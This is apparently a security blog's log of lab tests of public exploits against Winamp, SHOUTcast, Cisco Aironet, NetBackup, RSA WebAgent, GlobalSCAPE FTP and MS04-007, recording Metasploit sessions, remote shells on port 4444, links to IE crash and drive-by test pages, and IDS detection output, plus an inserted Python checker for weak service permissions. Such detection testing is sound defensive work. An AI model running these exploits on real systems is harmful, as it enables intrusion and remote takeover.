Musings

This blog is offered as one means for you, the reader, to check whether your own computer is being used for crime. E-mail: amaterasu@job.email.ne.jp



■Usage

C:\>srvcheck2 -?
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - atarasco@gmail.com

Usage:
-l list vulnerable services
-m <service> modify the configuration for that service
-c <command> Command to execute throw remote service
by default. bindshell application will be used
-H <Host> specify a remote host to connect ip/netbiosname)
-u <user> if not seletected Default logon credentials used)
-p <password> if not used Default logon credentials used)
-? Extended information with samples
examples:
srvcheck.exe -l (list local vulnerabilities)
srvcheck.exe -m service (spawn a shell at port 8080)
srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"
srvcheck -l -H host (list remote vulnerabilities)

C:\>




■MD5Sum

89b7dbaa6ef619f8c681ec077ae68d3c



■File Size

36,5 KB



■Description

Proof of concept of the Sudhakar Govindavajhala and Andrew Appel paper (http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf). Running as an unprivileged user, you can test whether your services are vulnerable and could be used to install a backdoor. Both source code and binary are included.
Microsoft advisory: http://microsoft.com/technet/security/advisory/914457.mspx

SrvCheck v2.0 is able to perform these checks remotely, using for example domain user credentials.

Third-party affected software:

HP Software: "Pml Driver HPZ12" (HP Printer Laserjet 4200L PCL 6)
Autodesk: "Autodesk Licensing Service"
Dell Power Management Software for network cards: "NICCONFIGSVC"
Macromedia: "Macromedia Licensing Service"
Zonelabs.com TrueVector Device Driver: "vsdatant"
C-Dilla Software: "C-DillaCdaC11BA"
Macrovision SECURITY Driver (Security Windows NT): "CdaC15BA"
Macrovision SECURITY Driver (Security Windows NT): "SecDrv"
Download FIX

Here is a short list of known vulnerable services under Windows XP SP2:

- Advanced User:
Service: DcomLaunch (SYSTEM)
Service: UpnpHost (Local Service)
Service: SSDPSRV (Local Service)
- User:
Service: UpnpHost (Local Service)
Service: SSDPSRV (Local Service)
- Network Config Operators:
Service: DcomLaunch (SYSTEM)
Service: UpnpHost (Local Service)
Service: SSDPSRV (Local Service)
Service: DHCP (SYSTEM)
Service: NetBT (SYSTEM - .sys driver)
Service: DnsCache (SYSTEM)

Windows 2000 Professional SP4:

- Power User:
Service: WMI - Windows Management Instrumentation Driver Extensions (SYSTEM)

Windows 2003 Standard Edition:

- Power User:
Service: DcomLaunch - DCOM Server Process Launcher (LocalSystem)
Service: kdc - Kerberos Key Distribution Center (SYSTEM)
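The permission condition that srvcheck reports, written out as an added Python example (not the tool's own code, nor the paper's): parse a service security descriptor in the SDDL form that `sc sdshow <service>` prints, and flag allow-ACEs that give a broad group rights sufficient to reconfigure the service. The SDDL strings are constructed samples, and the sets of "dangerous" rights and "broad" principals are this example's own choices.

```python
import re

# Service access rights (winsvc.h) keyed by SDDL token. DC = SERVICE_CHANGE_CONFIG,
# WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = GENERIC_ALL / GENERIC_WRITE.
RIGHTS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
          "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
          "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "GX": 0x20000000,
          "GW": 0x40000000, "GR": 0x80000000}
# Any of these lets the grantee repoint the service binary or account, directly
# or after first rewriting the DACL: the condition srvcheck reports.
DANGEROUS = {0x2: "SERVICE_CHANGE_CONFIG", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
             0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE"}
# Principals an unprivileged or semi-privileged user may hold (SDDL alias and SID).
BROAD = {"WD": "Everyone", "S-1-1-0": "Everyone",
         "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
         "IU": "Interactive", "S-1-5-4": "Interactive",
         "BU": "Users", "S-1-5-32-545": "Users",
         "PU": "Power Users", "S-1-5-32-547": "Power Users",
         "NO": "Network Configuration Operators", "S-1-5-32-556": "Network Configuration Operators"}
# (type;flags;rights;object_guid;inherit_guid;sid) - the two GUID fields are skipped.
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)")


def parse_rights(token):
    """Turn an SDDL rights field ('CCDCLC...' or hex '0x40002') into an access mask."""
    token = token.strip()
    if token.lower().startswith("0x"):
        return int(token, 16)
    if len(token) % 2:
        raise ValueError("malformed rights token: %r" % token)
    mask = 0
    for i in range(0, len(token), 2):
        mask |= RIGHTS[token[i:i + 2]]
    return mask


def dacl_aces(sddl):
    """Return (ace_type, access_mask, sid) for each ACE in the D: section."""
    m = re.search(r"D:([^:]*)", sddl)  # ACEs contain no ':' so this stops at the SACL
    if not m:
        return []
    return [(t, parse_rights(r), sid) for t, _f, r, sid in ACE_RE.findall(m.group(1))]


def weak_grants(sddl):
    """(principal, [right names]) for each allow-ACE letting a broad group reconfigure
    the service. Deny ACEs are ignored (assumed absent, as in default descriptors)."""
    findings = []
    for ace_type, mask, sid in dacl_aces(sddl):
        if ace_type == "A" and sid in BROAD:
            hits = [name for bit, name in DANGEROUS.items() if mask & bit]
            if hits:
                findings.append((BROAD[sid], hits))
    return findings


# Constructed samples in the form 'sc sdshow <service>' prints: a default-style
# descriptor (Power Users may start/stop, not reconfigure) and a weak one.
SAMPLES = {
    "GoodSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "WeakSvc": "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        for principal, rights in weak_grants(sddl):
            print("%s: %s has %s" % (name, principal, ", ".join(rights)))
```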


■Comment

A Metasploit Framework version has been newly released.



■Proof-of-concept code

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- -------- ------- -------------------------------------------
required HTTPPORT 8080 The local HTTP listener port
optional HTTPHOST 0.0.0.0 The local HTTP listener host
optional REALHOST External address to use for redirects (NAT)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC process Exit technique: "process", "thread", "seh"
required CMD The command string to execute

Target: Winamp 5.12 Universal


Metasploit Framework Usable Payloads
====================================

win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
msf winamp_playlist_unc(win32_exec) > exploit
[*] Waiting for connections to http://192.168.221.110:8080/
[*] HTTP Client connected from 192.168.221.106:17058, redirecting...
[*] HTTP Client connected from 192.168.221.106:17059, sending 184 bytes of payload...
[*] HTTP Client connected from 192.168.221.106:17082, redirecting...
[*] HTTP Client connected from 192.168.221.106:17083, sending 184 bytes of payload...



■SANS comment

While we're on the topic of audio software, there's a 0-day exploit out today for Winamp 5.12 that allows remote code execution via a crafted playlist (.pls) file. The proof-of-concept exploit suggests using an iframe to trigger a 'drive-by' attack on anyone unlucky enough to visit a website containing a malicious iframe; say, third-party advertisers and forum websites--the usual vectors for this sort of thing. Secunia's got a nice writeup of it here. There may be a work-around involving disassociating playlists (.pls, .m3u, etc...) and their mime types from the Winamp application. Other suggestions are welcome.


■Proof-of-concept code

C:\Report\Exploite\C>winamp.exe 192.168.221.180

Winamp 5.12 Remote Buffer Overflow Universal Exploit
Bug discovered & exploit coded by ATmaCA
Web:
http://www.spyinstructors.com && http://www.atmacasoft.com
E-Mail:
atmaca@icqmail.com
Credit to Kozan

crafted.pls has been created in the current directory.


■Test page

http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm


■Execution screen

Accessing the test page launched Calculator (calc.exe).



Item | Value
Attack | Remote
Attack port | 8000
Target OS | Unix
CVE | not yet investigated
MS | N/A
SP2 | N/A
Evidence | N/A
Packet | N/A


SANS comment

SHOUTCAST <= 1.9.4 Vulnerability, Exploit Available

On December 26, 2004, Secunia released an advisory regarding a vulnerability in Shoutcast. We've received a report about a few sites detecting odd log entries that fit the vulnerability description, with corresponding server crashes over the past few days. An exploit was published yesterday. The solution is to update to the latest version (v.1.9.5). The advisory is available at Secunia.

Updated to correct the original vulnerability publication date. This is an old hole, but there seem to be a number of people still running vulnerable versions. The exploit is new, and if you're running a SHOUTcast server, check your version.

The default port for SHOUTcast is 8000--Dshield shows a spike in targets on the 14th and more recently.


Trend of accesses to port 8000

http://isc.sans.org/port_details.php?port=8000&repax=1&tarax=2&srcax=2&percent=N&days=40
(Source: SANS)


Test environment

Role | OS | IP
Intruder | Windows2000 | 192.168.221.11
Victim | Windows2000 | 192.168.221.180
Sensor | Proventia M10


Proof-of-concept code

[root@linux iss]# clear
[root@linux iss]# ./shoutcast
[!] Shoutcast <= 1.9.4 exploit by crash-x
[-] Usage: ./shoutcast -h <host> [options]
[!] Options:
-h Hostname you want attack (required)
-p Port of the shoutcast (default: 8000)
-t Target (default: 0)
-s How long to sleep before try connect to shell in s (default: 1)
-S How long to sleep before write the next byte of shellcode to the memory in ms (default: 7)
[!] Targets:
0 Try to determine target
1 Shoutcast 1.9.4 all Linux distros
2 Shoutcast 1.9.2 all Linux distros
[root@linux iss]# ./shoutcast -h 192.168.221.180
[root@linux iss]# ./shoutcast -h 192.168.221.180
[!] Shoutcast <= 1.9.4 exploit by crash-x
[!] Connecting to target... done!
[-] Wasnt able to determine version of server, do it yourself!


Trace source


Trace

Priority | Signature name | Notes
Low | HTTP_Get | /doesntmatter
Low | TCP_Probe_Proxy |








■Comment

These are recent DoS attacks against Internet Explorer.

Browsing the URLs of test sites 1 to 9 below makes Internet Explorer crash with the message "iexplore.exe has encountered a problem and needs to close. We are sorry for the inconvenience."



■Test 1

2006-01-18 MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service

http://61.125.228.203/test1.htm


■Test 2

2005-12-29 MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit

http://61.125.228.203/test2.htm


■Test 3

2005-12-27 MS Internet Explorer 6.0 (mshtml.dll datasrc) Denial of Service Vuln

http://61.125.228.203/test3.htm


■Test 4

2005-12-14 MS Internet Explorer 6.0 (pre tag multiple single tags) Denial of Service

http://61.125.228.203/test4.htm


■Test 5

2005-10-28 MS Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit

http://61.125.228.203/test5.htm


■Test 6

2005-05-31 MS Internet Explorer - Multiple Stack Overflows Crash

http://61.125.228.203/test6.htm


■Test 7

2005-05-31 MS Internet Explorer - Multiple Stack Overflows Crash

http://61.125.228.203/test7.htm


■Test 8

2005-04-12 MS Internet Explorer DHTML Object Memory Corruption Exploit

http://61.125.228.203/test8.htm


■Test 9

2005-01-12 MS Internet Explorer .ANI Remote Stack Overflow (0.2)

http://61.125.228.203/test9.htm


■Impact

Not verified on the affected systems; impact unknown.

Affected systems:
* Cisco Aironet 1400 Series Wireless Bridges
* Cisco Aironet 1300 Series Access Points
* Cisco Aironet 1240AG Series Access Points
* Cisco Aironet 1230AG Series Access Points
* Cisco Aironet 1200 Series Access Points
* Cisco Aironet 1130AG Series Access Points
* Cisco Aironet 1100 Series Access Points
* Cisco Aironet 350 Series Access Points (running IOS)


Fix
Upgrade to Cisco IOS version 12.3-7-JA2. For more information see: http://www.cisco.com/public/sw-center/sw-wireless.shtml


■Test environment

・Attacker: 192.168.221.110 Linux

・Target: 192.168.221.180 Win2K


■Proof-of-concept code

[root@linux iss]# ./ciskill 192.168.221.1
CisKill -- Aironet Cisco Killer
Coded by: Pasv
Discovery credit: Eric Smith
Using device: 192.168.221.1

Press ctrl+c immediately if you wish to stop
Going in 5
4
3
2
1!
#:-1073742290 bytes sent: -1 (should be 42)
#:-1073742289 bytes sent: -1 (should be 42)
#:-1073742288 bytes sent: -1 (should be 42)
#:-1073742287 bytes sent: -1 (should be 42)
#:-1073742286 bytes sent: -1 (should be 42)
#:-1073742285 bytes sent: -1 (should be 42)
#:-1073742284 bytes sent: -1 (should be 42)
#:-1073742283 bytes sent: -1 (should be 42)
#:-1073742282 bytes sent: -1 (should be 42)
#:-1073742281 bytes sent: -1 (should be 42)
#:-1073742280 bytes sent: -1 (should be 42)
#:-1073742279 bytes sent: -1 (should be 42)
#:-1073742278 bytes sent: -1 (should be 42)
#:-1073742277 bytes sent: -1 (should be 42)
#:-1073742276 bytes sent: -1 (should be 42)
#:-1073742275 bytes sent: -1 (should be 42)
#:-1073742274 bytes sent: -1 (should be 42)
#:-1073742273 bytes sent: -1 (should be 42)
#:-1073742272 bytes sent: -1 (should be 42)
#:-1073742271 bytes sent: -1 (should be 42)
#:-1073742270 bytes sent: -1 (should be 42)
#:-1073742269 bytes sent: -1 (should be 42)
#:-1073742268 bytes sent: -1 (should be 42)
#:-1073742267 bytes sent: -1 (should be 42)
#:-1073742266 bytes sent: -1 (should be 42)
#:-1073742265 bytes sent: -1 (should be 42)
#:-1073742264 bytes sent: -1 (should be 42)
#:-1073742263 bytes sent: -1 (should be 42)
#:-1073742262 bytes sent: -1 (should be 42)
#:-1073742261 bytes sent: -1 (should be 42)
#:-1073742260 bytes sent: -1 (should be 42)
#:-1073742259 bytes sent: -1 (should be 42)
#:-1073742258 bytes sent: -1 (should be 42)
#:-1073742257 bytes sent: -1 (should be 42)


■Proventia detection results

N/A


■Snort

N/A


■Packet


■Comment

We tested the proof-of-concept code for the NetBackup stack overflow (tcp/13701) published on January 16.
Also, since yesterday, accesses to port 13701 that appear to use this proof-of-concept code have been increasing.


・Detection graph

(Source: SANS, http://isc.sans.org/diary.php)


・Details

http://isc.sans.org/specialport.php?port=13701



■Vulnerability overview

http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349

http://seer.support.veritas.com/docs/279553.htm

■Test environment

・Attacker

192.168.221.11 W2K

・Target

192.168.221.180 Win2K+SP4


■Impact

Because the target application was not installed, the impact could not be confirmed.

According to comments in the proof-of-concept code, a successful attack allows remote access.


■Proof-of-concept code

C:\NetBackup>nb 192.168.221.11 4444 192.168.221.180 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.

C:\NetBackup>nc 192.168.221.180 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


■Proventia detection results

Event Number : 1
Date/Time : 2006-01-19 00:48:22 JST
Tag Name : TCP_Probe_Other
Alert Name : TCP_Probe_Other
Severity : Low
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 2
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.37.180
Target Object Name : 13701
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 1079
Sensor DNS Name :
Sensor IP Address : 192.168.221.11
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :end-time
Attribute Value : 2006-01-19T00:46:46+09:00
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 1079
Attribute Name : :port
Attribute Value : 13701
Attribute Name : :reason
Attribute Value : RSTsent
Attribute Name : :repeat-count
Attribute Value : 2
Attribute Name : :start-time
Attribute Value : 2006-01-19T00:46:41+09:00
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.37.180
Attribute Name : :victim-port
Attribute Value : 13701
Attribute Name : algorithm-id
Attribute Value : 2003102
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet DestinationPort
Attribute Value : 1079
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.37.180
Attribute Name : Packet SourcePort
Attribute Value : 13701



■Snort detection results


N/A



■Attacker

192.168.221.11 W2K

■Target

192.168.221.180 Win2K+English


■Impact

Not verified on the target application.


■Proof-of-concept code

msf rsa_iiswebagent_redirect(win32_bind) > show targets

Supported Exploit Targets
=========================

0 RSA WebAgent 5.2
1 RSA WebAgent 5.3
2 RSA WebAgent 5.2 on Windows 2000 English
3 RSA WebAgent 5.3 on Windows 2000 English
4 RSA WebAgent 5.2 on Windows XP SP0-SP1 English
5 RSA WebAgent 5.3 on Windows XP SP0-SP1 English
6 RSA WebAgent 5.2 on Windows XP SP2 English
7 RSA WebAgent 5.3 on Windows XP SP2 English
8 RSA WebAgent 5.2 on Windows 2003 English SP0
9 RSA WebAgent 5.3 on Windows 2003 English SP0

msf rsa_iiswebagent_redirect(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------------------ -------------------
optional SSL Use SSL
required URL /WebID/IISWebAgentIF.dll The path to the DLL
required RHOST 192.168.221.180 The target address
required RPORT 80 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: RSA WebAgent 5.2 on Windows 2000 English

msf rsa_iiswebagent_redirect(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target RSA WebAgent 5.2 on Windows 2000 English
[*] Sending 8273 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.



■Proventia detection results

Event Number : 1
Date/Time : 2006-01-15 13:55:14 JST
Tag Name : HTTP_IIS_RSA_WebAgent_BO
Alert Name : HTTP_IIS_RSA_WebAgent_BO
Severity : High
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 1
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.221.180
Target Object Name : 80
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 2465
Sensor DNS Name : iss-sp2
Sensor IP Address : 10.4.6.100
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :accessed
Attribute Value : no
Attribute Name : :arg
Attribute Value : Redirect?url=eHkdblAYOgTvvARpwbCkvoxHkVPslYPTAAHGYAAjAAnhfnAGlilvTHKViIAAfvkPAvCMbEAXApAAyTuAAfBAxjFNJTMfAAVgkHOaUbAtkAbXsDoYCnApTAKHAAajAmCjglXMpAnKAAUKNbgIwAeAfAAAhLAwEGRaWAcsAAjlPWAAAgIJDAONApqfPbqbucdlSeOQAotBJTkyAqFDAdmAUAWKAAPRhUILCkASAAUYicKy
Attribute Name : :code
Attribute Value : 404
Attribute Name : :http-server
Attribute Value : Microsoft-IIS/5.0
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 2465
Attribute Name : :server
Attribute Value : 192.168.221.180:80
Attribute Name : :URL
Attribute Value : /WebID/IISWebAgentIF.dll
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.221.180
Attribute Name : :victim-port
Attribute Value : 80
Attribute Name : algorithm-id
Attribute Value : 2121035
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : LOGEVIDENCE
Attribute Value : Default
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.221.180
Attribute Name : Packet DestinationPort
Attribute Value : 80
Attribute Name : Packet DestinationPortName
Attribute Value : http
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet SourcePort
Attribute Value : 2465


■Snort detection results

01/15-13:54:34.495050 [**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**] {TCP} 192.168.221.11:2465 -> 192.168.37.180:80

■Proof-of-concept code

msf globalscapeftp_user_input(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required PASS metasploit@ Password
required RHOST The target address
required RPORT 21 The target port
required USER anonymous Username

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: GlobalSCAPE Secure FTP Server <= 3.0.2 Universal

msf globalscapeftp_user_input(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Trying GlobalSCAPE Secure FTP Server <= 3.0.2 Universal using return addres
0x1002f01f....
[*] 220 test-7nz5l7tfed Microsoft FTP Service (Version 5.0).
[*] Login as anonymous/metasploit@
[*] Sending evil buffer....
[*] Exiting Bind Handler.


■Snort detection results

01/15-13:44:48.151148 [**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**] {TCP} 192.168.221.11:2342 -> 192.168.37.180:80
01/15-13:44:50.043350 [**] [122:1:0] (portscan) TCP Portscan [**] {PROTO255} 192.168.221.11 -> 192.168.37.180
01/15-13:48:41.540604 [**] [1:1748:8] FTP command overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2347 -> 192.168.37.180:21
01/15-13:48:41.541239 [**] [1:1748:8] FTP command overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2347 -> 192.168.37.180:21
01/15-13:48:41.541763 [**] [1:1748:8] FTP command overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2347 -> 192.168.37.180:21


■Vulnerability description: MS04-007

http://www.microsoft.com/japan/technet/security/Bulletin/MS04-007.mspx

■Attacker

192.168.221.11 W2K

■Target

192.168.221.180 Win2K+English, WinXP+Japanese


■Impact

In the proof-of-concept run below, the attack succeeded and we confirmed that a remote connection to the target host could be made through port 4444.


■Proof-of-concept code

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ---------------------------
optional SSL The target service uses SSL
required RHOST The target address
required RPORT 445 The target service port
required PROTO smb Protocol (smb or http)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf msasn1_ms04_007_killbill(win32_bind) > set RHOST 192.168.221.180
RHOST -> 192.168.221.180

msf msasn1_ms04_007_killbill(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP2-SP4 + Windows XP SP0-SP1
[*] Sending SMB negotiate request...
[*] Got connection from 192.168.221.11:1894 <-> 192.168.221.180:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.37.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.37.1


■Proventia detection results

Event Number : 1
Date/Time : 2006-01-15 12:38:32 JST
Tag Name : ASN1_Constr_BitStr_Heap_Corruption
Alert Name : ASN1_Constr_BitStr_Heap_Corruption
Severity : High
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 1
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.37.180
Target Object Name : 445
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 2157
Sensor DNS Name :
Sensor IP Address : 192.168.221.11
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 2157
Attribute Name : :offset
Attribute Value : 1060
Attribute Name : :protocol
Attribute Value : SMB
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.37.180
Attribute Name : :victim-port
Attribute Value : 445
Attribute Name : algorithm-id
Attribute Value : 2120072
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.37.180
Attribute Name : Packet DestinationPort
Attribute Value : 445
Attribute Name : Packet DestinationPortName
Attribute Value : microsoft-ds
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet SourcePort
Attribute Value : 2157


■Snort

overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2157 -> 192.168.37.180:445
01/15-12:39:59.839951 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification:

overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2173 -> 192.168.37.180:445


